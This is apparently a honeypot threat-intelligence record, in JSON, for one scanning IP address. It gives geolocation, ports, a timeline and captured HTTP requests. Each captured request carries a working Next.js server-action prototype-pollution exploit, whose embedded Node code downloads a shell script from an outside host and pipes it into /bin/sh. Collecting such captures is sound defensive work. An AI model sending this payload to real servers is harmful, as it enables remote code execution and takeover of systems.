{"ip":"124.198.131.39","total_events":408,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"CDN"},"first_seen":"2026-05-30T10:38:52","last_seen":"2026-06-21T10:16:29","events_24h":35,"events_7d":209,"geo":{"country_code":"US","country_name":"United States","region":"New York","city":"New York","lat":40.7126,"lon":-74.0066,"asn":210558,"org":"1337 Services GmbH"},"source_domain":"124.198.131.39.powered.by.rdp.sh","known_scanners":[],"scanner_tag":{"key":"peeringdb:as210558","label":"1337 Services GmbH","category":"cdn","url":"https://www.peeringdb.com/asn/210558"},"cve_matches":[],"top_ports":[{"port":3000,"proto":"tcp","label":"Web-alt","count":206},{"port":3001,"proto":"tcp","label":"","count":107},{"port":1881,"proto":"tcp","label":"","count":59},{"port":8021,"proto":"tcp","label":"","count":19},{"port":8022,"proto":"tcp","label":"","count":7},{"port":7001,"proto":"tcp","label":"WebLogic","count":7},{"port":9999,"proto":"tcp","label":"","count":3}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["po11nn0700_b765b97b3083","po11nn0600_c33db1b45fc9","po11nn0700_2b0ad527c537"]},"fingerprint_peers":{"po11nn0600_c33db1b45fc9":3,"po11nn0700_2b0ad527c537":5,"po11nn0700_b765b97b3083":3},"user_agents":["Mozilla/5.0 (rondo2012@atomicmail.io)"],"timeline":[{"date":"2026-05-30","count":6},{"date":"2026-05-31","count":9},{"date":"2026-06-01","count":10},{"date":"2026-06-02","count":6},{"date":"2026-06-03","count":6},{"date":"2026-06-04","count":16},{"date":"2026-06-05","count":14},{"date":"2026-06-06","count":9},{"date":"2026-06-07","count":14},{"date":"2026-06-08","count":16},{"date":"2026-06-09","count":7},{"date":"2026-06-10","count":17},{"date":"2026-06-11","count":21},{"date":"2026-06-12","count":14},{"date":"2026-06-13","count":28},{"date":"2026-06-14","count":18},{"date":"2026-06-15","count":21},{"date":"2026-06-16","count":16},{"date":"2026-06-17","count":23},{"date":"2026-06-18","count":36},{"date":"2026-06-19","count":46},{"date":"2026-06-20","count":38},{"date":"2026-06-21","count":17}],"recent_events":[{"timestamp":"2026-06-21T10:16:29","port":3001,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"connection\":\"close\",\"content-length\":\"694\",\"content-type\":\"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02\",\"host\":\"<HONEYPOT>:3001\",\"next-action\":\"x\",\"user-agent\":\"Mozilla/5.0 (rondo2012@atomicmail.io)\"}","body":"--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require('http').request({host:'45.153.34.153', port:80, path:'/rondo.aqu.sh', headers:{'User-Agent':'node'}},r=>r.pipe(process.mainModule.require('child_process').spawn('/bin/sh').stdin)).end();\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n--0fdf55df9e085737676f582ed4e95a02--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/_next/server","summary":"","payload_hex":"504f5354202f5f6e6578742f73657276657220485454502f312e310d0a486f73743a20<HONEYPOT>3a333030310d0a557365722d4167656e743a204d6f7a696c6c612f352e302028726f6e646f323031324061746f6d69636d61696c2e696f290d0a436f6e6e656374696f6e3a20636c6f73650d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d4c656e6774683a203639340d0a0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a7b227468656e223a2224313a5f5f70726f746f5f5f3a7468656e222c22737461747573223a227265736f6c7665645f6d6f64656c222c22726561736f6e223a2d312c2276616c7565223a227b5c227468656e5c223a5c222442313333375c227d222c225f726573706f6e7365223a7b225f707265666978223a2270726f636573732e6d61696e4d6f64756c652e7265717569726528276874747027292e72657175657374287b686f73743a2734352e3135332e33342e313533272c20706f72743a38302c20706174683a272f726f6e646f2e6171752e7368272c20686561646572733a7b27557365722d4167656e74273a276e6f6465277d7d2c723d3e722e706970652870726f636573732e6d61696e4d6f64756c652e7265717569726528276368696c645f70726f6365737327292e737061776e28272f62696e2f736827292e737464696e29292e656e6428293b222c225f6368756e6b73223a22245132222c225f666f726d44617461223a7b22676574223a2224313a636f6e7374727563746f723a636f6e7374727563746f72227d7d7d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a22244030220d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2232220d0a0d0a5b5d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130322d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (rondo2012@atomicmail.io)","community_id":"1:xWATYHAE/GLUzPVF+1fTmgeLk8A=","ja3":"","session":"59554637-6528-458b-86dd-bf56d3e0bba8","seq":1,"duration_ms":0,"bytes_in":963,"bytes_out":79},{"timestamp":"2026-06-21T10:16:13","port":3001,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"connection\":\"close\",\"content-length\":\"694\",\"content-type\":\"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02\",\"host\":\"<HONEYPOT>:3001\",\"next-action\":\"x\",\"user-agent\":\"Mozilla/5.0 (rondo2012@atomicmail.io)\"}","body":"--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require('http').request({host:'45.153.34.153', port:80, path:'/rondo.aqu.sh', headers:{'User-Agent':'node'}},r=>r.pipe(process.mainModule.require('child_process').spawn('/bin/sh').stdin)).end();\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n--0fdf55df9e085737676f582ed4e95a02--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/api/route","summary":"","payload_hex":"504f5354202f6170692f726f75746520485454502f312e310d0a486f73743a20<HONEYPOT>3a333030310d0a557365722d4167656e743a204d6f7a696c6c612f352e302028726f6e646f323031324061746f6d69636d61696c2e696f290d0a436f6e6e656374696f6e3a20636c6f73650d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d4c656e6774683a203639340d0a0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a7b227468656e223a2224313a5f5f70726f746f5f5f3a7468656e222c22737461747573223a227265736f6c7665645f6d6f64656c222c22726561736f6e223a2d312c2276616c7565223a227b5c227468656e5c223a5c222442313333375c227d222c225f726573706f6e7365223a7b225f707265666978223a2270726f636573732e6d61696e4d6f64756c652e7265717569726528276874747027292e72657175657374287b686f73743a2734352e3135332e33342e313533272c20706f72743a38302c20706174683a272f726f6e646f2e6171752e7368272c20686561646572733a7b27557365722d4167656e74273a276e6f6465277d7d2c723d3e722e706970652870726f636573732e6d61696e4d6f64756c652e7265717569726528276368696c645f70726f6365737327292e737061776e28272f62696e2f736827292e737464696e29292e656e6428293b222c225f6368756e6b73223a22245132222c225f666f726d44617461223a7b22676574223a2224313a636f6e7374727563746f723a636f6e7374727563746f72227d7d7d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a22244030220d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2232220d0a0d0a5b5d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130322d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (rondo2012@atomicmail.io)","community_id":"1:is6TQWksmhAG++grWLaqXHwB1Kg=","ja3":"","session":"5fc1db2a-25f8-407c-83ba-232abdafc059","seq":1,"duration_ms":0,"bytes_in":960,"bytes_out":79},{"timestamp":"2026-06-21T10:16:05","port":3001,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"connection\":\"close\",\"content-length\":\"694\",\"content-type\":\"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02\",\"host\":\"<HONEYPOT>:3001\",\"next-action\":\"x\",\"user-agent\":\"Mozilla/5.0 (rondo2012@atomicmail.io)\"}","body":"--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require('http').request({host:'45.153.34.153', port:80, path:'/rondo.aqu.sh', headers:{'User-Agent':'node'}},r=>r.pipe(process.mainModule.require('child_process').spawn('/bin/sh').stdin)).end();\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n--0fdf55df9e085737676f582ed4e95a02--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/_next","summary":"","payload_hex":"504f5354202f5f6e65787420485454502f312e310d0a486f73743a20<HONEYPOT>3a333030310d0a557365722d4167656e743a204d6f7a696c6c612f352e302028726f6e646f323031324061746f6d69636d61696c2e696f290d0a436f6e6e656374696f6e3a20636c6f73650d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d4c656e6774683a203639340d0a0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a7b227468656e223a2224313a5f5f70726f746f5f5f3a7468656e222c22737461747573223a227265736f6c7665645f6d6f64656c222c22726561736f6e223a2d312c2276616c7565223a227b5c227468656e5c223a5c222442313333375c227d222c225f726573706f6e7365223a7b225f707265666978223a2270726f636573732e6d61696e4d6f64756c652e7265717569726528276874747027292e72657175657374287b686f73743a2734352e3135332e33342e313533272c20706f72743a38302c20706174683a272f726f6e646f2e6171752e7368272c20686561646572733a7b27557365722d4167656e74273a276e6f6465277d7d2c723d3e722e706970652870726f636573732e6d61696e4d6f64756c652e7265717569726528276368696c645f70726f6365737327292e737061776e28272f62696e2f736827292e737464696e29292e656e6428293b222c225f6368756e6b73223a22245132222c225f666f726d44617461223a7b22676574223a2224313a636f6e7374727563746f723a636f6e7374727563746f72227d7d7d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a22244030220d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2232220d0a0d0a5b5d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130322d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (rondo2012@atomicmail.io)","community_id":"1:oNEie+Nnc+MCERlCAD3b1Rbgpgs=","ja3":"","session":"5fbe1ccc-dfc9-4706-960c-bb11de6e9aa3","seq":1,"duration_ms":0,"bytes_in":956,"bytes_out":79},{"timestamp":"2026-06-21T10:16:01","port":3001,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"connection\":\"close\",\"content-length\":\"694\",\"content-type\":\"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02\",\"host\":\"<HONEYPOT>:3001\",\"next-action\":\"x\",\"user-agent\":\"Mozilla/5.0 (rondo2012@atomicmail.io)\"}","body":"--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require('http').request({host:'45.153.34.153', port:80, path:'/rondo.aqu.sh', headers:{'User-Agent':'node'}},r=>r.pipe(process.mainModule.require('child_process').spawn('/bin/sh').stdin)).end();\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n--0fdf55df9e085737676f582ed4e95a02--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/_next/server","summary":"","payload_hex":"504f5354202f5f6e6578742f73657276657220485454502f312e310d0a486f73743a20<HONEYPOT>3a333030310d0a557365722d4167656e743a204d6f7a696c6c612f352e302028726f6e646f323031324061746f6d69636d61696c2e696f290d0a436f6e6e656374696f6e3a20636c6f73650d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d4c656e6774683a203639340d0a0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a7b227468656e223a2224313a5f5f70726f746f5f5f3a7468656e222c22737461747573223a227265736f6c7665645f6d6f64656c222c22726561736f6e223a2d312c2276616c7565223a227b5c227468656e5c223a5c222442313333375c227d222c225f726573706f6e7365223a7b225f707265666978223a2270726f636573732e6d61696e4d6f64756c652e7265717569726528276874747027292e72657175657374287b686f73743a2734352e3135332e33342e313533272c20706f72743a38302c20706174683a272f726f6e646f2e6171752e7368272c20686561646572733a7b27557365722d4167656e74273a276e6f6465277d7d2c723d3e722e706970652870726f636573732e6d61696e4d6f64756c652e7265717569726528276368696c645f70726f6365737327292e737061776e28272f62696e2f736827292e737464696e29292e656e6428293b222c225f6368756e6b73223a22245132222c225f666f726d44617461223a7b22676574223a2224313a636f6e7374727563746f723a636f6e7374727563746f72227d7d7d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a22244030220d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2232220d0a0d0a5b5d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130322d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (rondo2012@atomicmail.io)","community_id":"1:6EO64cXS4PwOSlWhkiBaSFbSLgM=","ja3":"","session":"f23e19c2-545a-4c67-9102-8086c2079210","seq":1,"duration_ms":0,"bytes_in":963,"bytes_out":79},{"timestamp":"2026-06-21T10:15:58","port":3001,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"connection\":\"close\",\"content-length\":\"694\",\"content-type\":\"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02\",\"host\":\"<HONEYPOT>:3001\",\"next-action\":\"x\",\"user-agent\":\"Mozilla/5.0 (rondo2012@atomicmail.io)\"}","body":"--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require('http').request({host:'45.153.34.153', port:80, path:'/rondo.aqu.sh', headers:{'User-Agent':'node'}},r=>r.pipe(process.mainModule.require('child_process').spawn('/bin/sh').stdin)).end();\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n--0fdf55df9e085737676f582ed4e95a02--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/app","summary":"","payload_hex":"504f5354202f61707020485454502f312e310d0a486f73743a20<HONEYPOT>3a333030310d0a557365722d4167656e743a204d6f7a696c6c612f352e302028726f6e646f323031324061746f6d69636d61696c2e696f290d0a436f6e6e656374696f6e3a20636c6f73650d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d4c656e6774683a203639340d0a0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a7b227468656e223a2224313a5f5f70726f746f5f5f3a7468656e222c22737461747573223a227265736f6c7665645f6d6f64656c222c22726561736f6e223a2d312c2276616c7565223a227b5c227468656e5c223a5c222442313333375c227d222c225f726573706f6e7365223a7b225f707265666978223a2270726f636573732e6d61696e4d6f64756c652e7265717569726528276874747027292e72657175657374287b686f73743a2734352e3135332e33342e313533272c20706f72743a38302c20706174683a272f726f6e646f2e6171752e7368272c20686561646572733a7b27557365722d4167656e74273a276e6f6465277d7d2c723d3e722e706970652870726f636573732e6d61696e4d6f64756c652e7265717569726528276368696c645f70726f6365737327292e737061776e28272f62696e2f736827292e737464696e29292e656e6428293b222c225f6368756e6b73223a22245132222c225f666f726d44617461223a7b22676574223a2224313a636f6e7374727563746f723a636f6e7374727563746f72227d7d7d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a22244030220d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2232220d0a0d0a5b5d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130322d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (rondo2012@atomicmail.io)","community_id":"1:DfzAST0uVEtAitxmkcYg+AIkxak=","ja3":"","session":"1cf591c0-4c1a-4e36-b01d-ebbb7ac70727","seq":1,"duration_ms":0,"bytes_in":954,"bytes_out":79},{"timestamp":"2026-06-21T09:36:12","port":3001,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"connection\":\"close\",\"content-length\":\"694\",\"content-type\":\"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02\",\"host\":\"<HONEYPOT>:3001\",\"next-action\":\"x\",\"user-agent\":\"Mozilla/5.0 (rondo2012@atomicmail.io)\"}","body":"--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require('http').request({host:'45.153.34.153', port:80, path:'/rondo.aqu.sh', headers:{'User-Agent':'node'}},r=>r.pipe(process.mainModule.require('child_process').spawn('/bin/sh').stdin)).end();\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n--0fdf55df9e085737676f582ed4e95a02--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/api","summary":"","payload_hex":"504f5354202f61706920485454502f312e310d0a486f73743a20<HONEYPOT>3a333030310d0a557365722d4167656e743a204d6f7a696c6c612f352e302028726f6e646f323031324061746f6d69636d61696c2e696f290d0a436f6e6e656374696f6e3a20636c6f73650d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d4c656e6774683a203639340d0a0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a7b227468656e223a2224313a5f5f70726f746f5f5f3a7468656e222c22737461747573223a227265736f6c7665645f6d6f64656c222c22726561736f6e223a2d312c2276616c7565223a227b5c227468656e5c223a5c222442313333375c227d222c225f726573706f6e7365223a7b225f707265666978223a2270726f636573732e6d61696e4d6f64756c652e7265717569726528276874747027292e72657175657374287b686f73743a2734352e3135332e33342e313533272c20706f72743a38302c20706174683a272f726f6e646f2e6171752e7368272c20686561646572733a7b27557365722d4167656e74273a276e6f6465277d7d2c723d3e722e706970652870726f636573732e6d61696e4d6f64756c652e7265717569726528276368696c645f70726f6365737327292e737061776e28272f62696e2f736827292e737464696e29292e656e6428293b222c225f6368756e6b73223a22245132222c225f666f726d44617461223a7b22676574223a2224313a636f6e7374727563746f723a636f6e7374727563746f72227d7d7d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a22244030220d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2232220d0a0d0a5b5d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130322d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (rondo2012@atomicmail.io)","community_id":"1:j5DcjkTBO9aoCzzRHDu015BK+vg=","ja3":"","session":"1c21f88c-2529-493a-bf8d-bb9b4d4a4c08","seq":1,"duration_ms":0,"bytes_in":952,"bytes_out":79},{"timestamp":"2026-06-21T09:27:25","port":3000,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"connection\":\"close\",\"content-length\":\"694\",\"content-type\":\"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02\",\"host\":\"<HONEYPOT>:3000\",\"next-action\":\"x\",\"user-agent\":\"Mozilla/5.0 (rondo2012@atomicmail.io)\"}","body":"--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require('http').request({host:'45.153.34.153', port:80, path:'/rondo.aqu.sh', headers:{'User-Agent':'node'}},r=>r.pipe(process.mainModule.require('child_process').spawn('/bin/sh').stdin)).end();\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n--0fdf55df9e085737676f582ed4e95a02--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/api","summary":"","payload_hex":"504f5354202f61706920485454502f312e310d0a486f73743a20<HONEYPOT>3a333030300d0a557365722d4167656e743a204d6f7a696c6c612f352e302028726f6e646f323031324061746f6d69636d61696c2e696f290d0a436f6e6e656374696f6e3a20636c6f73650d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d4c656e6774683a203639340d0a0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a7b227468656e223a2224313a5f5f70726f746f5f5f3a7468656e222c22737461747573223a227265736f6c7665645f6d6f64656c222c22726561736f6e223a2d312c2276616c7565223a227b5c227468656e5c223a5c222442313333375c227d222c225f726573706f6e7365223a7b225f707265666978223a2270726f636573732e6d61696e4d6f64756c652e7265717569726528276874747027292e72657175657374287b686f73743a2734352e3135332e33342e313533272c20706f72743a38302c20706174683a272f726f6e646f2e6171752e7368272c20686561646572733a7b27557365722d4167656e74273a276e6f6465277d7d2c723d3e722e706970652870726f636573732e6d61696e4d6f64756c652e7265717569726528276368696c645f70726f6365737327292e737061776e28272f62696e2f736827292e737464696e29292e656e6428293b222c225f6368756e6b73223a22245132222c225f666f726d44617461223a7b22676574223a2224313a636f6e7374727563746f723a636f6e7374727563746f72227d7d7d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a22244030220d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2232220d0a0d0a5b5d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130322d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (rondo2012@atomicmail.io)","community_id":"1:g0szJep7tWQpDqOM9z+LKh1KKkM=","ja3":"","session":"b111c361-7b98-4153-8ee6-d2f78a9db018","seq":1,"duration_ms":0,"bytes_in":952,"bytes_out":79},{"timestamp":"2026-06-21T09:11:46","port":3001,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"connection\":\"close\",\"content-length\":\"694\",\"content-type\":\"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02\",\"host\":\"<HONEYPOT>:3001\",\"next-action\":\"x\",\"user-agent\":\"Mozilla/5.0 (rondo2012@atomicmail.io)\"}","body":"--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require('http').request({host:'45.153.34.153', port:80, path:'/rondo.aqu.sh', headers:{'User-Agent':'node'}},r=>r.pipe(process.mainModule.require('child_process').spawn('/bin/sh').stdin)).end();\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n--0fdf55df9e085737676f582ed4e95a02--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/","summary":"","payload_hex":"504f5354202f20485454502f312e310d0a486f73743a20<HONEYPOT>3a333030310d0a557365722d4167656e743a204d6f7a696c6c612f352e302028726f6e646f323031324061746f6d69636d61696c2e696f290d0a436f6e6e656374696f6e3a20636c6f73650d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d4c656e6774683a203639340d0a0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a7b227468656e223a2224313a5f5f70726f746f5f5f3a7468656e222c22737461747573223a227265736f6c7665645f6d6f64656c222c22726561736f6e223a2d312c2276616c7565223a227b5c227468656e5c223a5c222442313333375c227d222c225f726573706f6e7365223a7b225f707265666978223a2270726f636573732e6d61696e4d6f64756c652e7265717569726528276874747027292e72657175657374287b686f73743a2734352e3135332e33342e313533272c20706f72743a38302c20706174683a272f726f6e646f2e6171752e7368272c20686561646572733a7b27557365722d4167656e